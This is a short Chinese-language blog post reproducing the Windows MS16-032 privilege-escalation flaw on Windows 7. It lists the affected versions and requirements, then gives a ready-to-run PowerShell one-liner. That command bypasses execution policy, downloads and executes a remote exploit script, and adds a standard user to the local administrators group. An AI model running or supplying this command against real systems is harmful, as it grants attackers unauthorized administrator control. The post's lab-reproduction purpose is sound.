exploit-db的详情： https://www.exploit-db.com/exploits/39574/

注意点：此漏洞影响从Vista到Windows 10的所有Windows版本（包括服务器版本）以及为了实现利用，因为PowerShell脚本指示需要满足以下要求：目标系统需要有2个以上的CPU核心 PowerShell v2.0及更高版本必须正在运行

此漏洞会影响以下Microsoft产品：

Windows Vista
Windows 7
Windows 8.1
Windows 10
Windows 2008 Server
Windows 2012 Server

复现测试的版本是Windows 7，其他的没有测试，可以自行进行测试；漏洞测试0x01使用标准用户登陆win7,下图是当前登录用户px的详细信息

0x02在powershell里面，直接执行命令进行提权，简单粗暴

powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/Ridter/Pentest/master/powershell/MyShell/Invoke-MS16-032.ps1');Invoke-MS16-032 -Application cmd.exe -commandline '/c net localgroup administrators px /add'" 

0x03下面就是见证奇迹的时刻了

漏洞利用成功，有好几种方式，这只是其中一种。下面也是一种权限提升的方式，简单写一下脚本的下载下载地址：https://www.exploit-db.com/exploits/39719/

转载请注明：Adminxe's Blog » MS16-032 提权 漏洞复现